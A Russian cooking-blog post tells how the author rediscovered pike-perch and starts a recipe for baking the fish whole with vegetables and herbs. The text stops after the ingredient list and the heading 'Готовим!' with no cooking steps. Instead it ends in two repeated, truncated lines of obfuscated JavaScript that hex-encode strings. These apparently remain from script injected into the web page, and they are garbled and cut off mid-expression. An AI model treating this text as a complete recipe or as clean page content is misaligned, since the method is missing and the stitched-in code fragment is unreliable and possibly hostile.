Судак в духовке целиком
Недавно я писала о рыбе, какую мы покупали раньше, какую перестали покупать сейчас из-за дороговизны. И в комментариях к посту, человек , занимающийся поставками рыбы, порекомендовал мне покупать судака.
И я подумала, а ведь правда, почему я так давно его не готовила и совсем забыла? А рыба-то ведь знатная, и весьма универсальная при этом, подходит для любых блюд практически. И я решила срочно наверстывать это упущение. Мужу на рыночную закупку судак был вписан в список. И он привез мне его, огромного, на два килограмма. На рынке мне его почистили и выпотрошили, дело было за малым-приготовить.
Судака я планировала запечь целиком, с овощами и пряными травами. Что с успехом и воплотила, и казавшийся таким огромным судак был целиком съеден за субботним ужином без остатка и с полным восторгом. Белое, нежное и сочное мясо, умеренное количество костей, и конечно свежесть, вот сколько у него плюсов. А минусов, а минусов по моему нет совсем, я рыбу только чистить не люблю, а он ко мне приехал идеально чистеньким. Так что судаку в нашем меню быть, и надеюсь регулярно и часто, рецептов я запланировала много.
Сегодняшний рецепт одновременно довольно простой, но подойдет для угощения гостей. Целиком запеченная рыба смотрится весьма эффектно. Идеально вместо розмарина взять для рыбы шалфей, если найдете.
Ингредиенты:
1.Судак 1,5 кг.
2.Картофель 1 кг.
3.Помидоры 3 шт.
4.Петрушка пол-пучка
5.Чеснок 3 зубчика
6.Розмарин несколько веточек
7.Маслины 50 грамм
8.Масло оливковое 4 -5 ст.л.
9.Соль
10.Перец черный
Готовим!
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o